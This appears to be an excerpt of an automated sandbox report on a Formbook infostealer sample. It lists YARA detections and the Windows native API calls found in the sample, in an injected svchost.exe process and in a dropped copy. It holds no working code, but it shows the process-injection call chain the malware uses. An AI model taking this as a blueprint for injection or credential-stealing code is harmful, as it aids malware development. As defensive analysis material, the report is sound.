          Source: 1.1.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.2.nb4dzn5jg.exe.4290000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.nb4dzn5jg.exe.4290000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_0044E674 NtdllDefWindowProc_A,0_2_0044E674
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_00433764 NtdllDefWindowProc_A,GetCapture,0_2_00433764
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_00428B2C NtdllDefWindowProc_A,0_2_00428B2C
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_0044EDF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_0044EDF0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_0044EEA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_0044EEA0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_00443124 GetSubMenu,SaveDC,RestoreDC,731EB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_00443124
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419C90 NtCreateFile,1_2_00419C90
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419D40 NtReadFile,1_2_00419D40
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419DC0 NtClose,1_2_00419DC0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419E70 NtAllocateVirtualMemory,1_2_00419E70
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419C8A NtCreateFile,1_2_00419C8A
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419D3A NtReadFile,1_2_00419D3A
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419DBA NtClose,1_2_00419DBA
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419EEA NtAllocateVirtualMemory,1_2_00419EEA
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A498F0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A49860
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49840 NtDelayExecution,LdrInitializeThunk,1_2_00A49840
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk,1_2_00A499A0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A49910
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49A20 NtResumeThread,LdrInitializeThunk,1_2_00A49A20
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A49A00
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49A50 NtCreateFile,LdrInitializeThunk,1_2_00A49A50
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A495D0 NtClose,LdrInitializeThunk,1_2_00A495D0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49540 NtReadFile,LdrInitializeThunk,1_2_00A49540
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A496E0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A49660
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A497A0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A49780
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A49710
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A498A0 NtWriteVirtualMemory,1_2_00A498A0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49820 NtEnumerateKey,1_2_00A49820
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A4B040 NtSuspendThread,1_2_00A4B040
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A499D0 NtCreateProcessEx,1_2_00A499D0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49950 NtQueueApcThread,1_2_00A49950
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49A80 NtOpenDirectoryObject,1_2_00A49A80
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49A10 NtQuerySection,1_2_00A49A10
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A4A3B0 NtGetContextThread,1_2_00A4A3B0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49B00 NtSetValueKey,1_2_00A49B00
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A495F0 NtQueryInformationFile,1_2_00A495F0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49520 NtWaitForSingleObject,1_2_00A49520
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A4AD30 NtSetContextThread,1_2_00A4AD30
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49560 NtWriteFile,1_2_00A49560
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A496D0 NtCreateKey,1_2_00A496D0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49610 NtEnumerateValueKey,1_2_00A49610
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49670 NtQueryInformationProcess,1_2_00A49670
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49650 NtQueryValueKey,1_2_00A49650
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49FE0 NtCreateMutant,1_2_00A49FE0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49730 NtQueryVirtualMemory,1_2_00A49730
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A4A710 NtOpenProcessToken,1_2_00A4A710
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49760 NtOpenProcess,1_2_00A49760
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49770 NtSetInformationFile,1_2_00A49770
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A4A770 NtOpenThread,1_2_00A4A770
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_1_00419C90 NtCreateFile,1_1_00419C90
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_1_00419D40 NtReadFile,1_1_00419D40
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_1_00419DC0 NtClose,1_1_00419DC0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_1_00419E70 NtAllocateVirtualMemory,1_1_00419E70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069B00 NtSetValueKey,LdrInitializeThunk,3_2_03069B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069710 NtQueryInformationToken,LdrInitializeThunk,3_2_03069710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069770 NtSetInformationFile,LdrInitializeThunk,3_2_03069770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069780 NtMapViewOfSection,LdrInitializeThunk,3_2_03069780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069FE0 NtCreateMutant,LdrInitializeThunk,3_2_03069FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069610 NtEnumerateValueKey,LdrInitializeThunk,3_2_03069610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069650 NtQueryValueKey,LdrInitializeThunk,3_2_03069650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069A50 NtCreateFile,LdrInitializeThunk,3_2_03069A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03069660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030696D0 NtCreateKey,LdrInitializeThunk,3_2_030696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030696E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_030696E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_03069910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069540 NtReadFile,LdrInitializeThunk,3_2_03069540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069560 NtWriteFile,LdrInitializeThunk,3_2_03069560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030699A0 NtCreateSection,LdrInitializeThunk,3_2_030699A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030695D0 NtClose,LdrInitializeThunk,3_2_030695D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069840 NtDelayExecution,LdrInitializeThunk,3_2_03069840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069860 NtQuerySystemInformation,LdrInitializeThunk,3_2_03069860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A710 NtOpenProcessToken,3_2_0306A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069730 NtQueryVirtualMemory,3_2_03069730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069760 NtOpenProcess,3_2_03069760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A770 NtOpenThread,3_2_0306A770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030697A0 NtUnmapViewOfSection,3_2_030697A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A3B0 NtGetContextThread,3_2_0306A3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069A00 NtProtectVirtualMemory,3_2_03069A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069A10 NtQuerySection,3_2_03069A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069A20 NtResumeThread,3_2_03069A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069670 NtQueryInformationProcess,3_2_03069670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069A80 NtOpenDirectoryObject,3_2_03069A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069520 NtWaitForSingleObject,3_2_03069520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306AD30 NtSetContextThread,3_2_0306AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069950 NtQueueApcThread,3_2_03069950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030699D0 NtCreateProcessEx,3_2_030699D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030695F0 NtQueryInformationFile,3_2_030695F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069820 NtEnumerateKey,3_2_03069820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306B040 NtSuspendThread,3_2_0306B040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030698A0 NtWriteVirtualMemory,3_2_030698A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030698F0 NtReadVirtualMemory,3_2_030698F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02A89E70 NtAllocateVirtualMemory,3_2_02A89E70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02A89C90 NtCreateFile,3_2_02A89C90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02A89DC0 NtClose,3_2_02A89DC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02A89D40 NtReadFile,3_2_02A89D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02A89EEA NtAllocateVirtualMemory,3_2_02A89EEA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02A89C8A NtCreateFile,3_2_02A89C8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02A89DBA NtClose,3_2_02A89DBA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_02A89D3A NtReadFile,3_2_02A89D3A
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exeCode function: 26_2_0044E674 NtdllDefWindowProc_A,26_2_0044E674
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exeCode function: 26_2_00433764 NtdllDefWindowProc_A,GetCapture,26_2_00433764
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exeCode function: 26_2_00428B2C NtdllDefWindowProc_A,26_2_00428B2C
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exeCode function: 26_2_0044EDF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,26_2_0044EDF0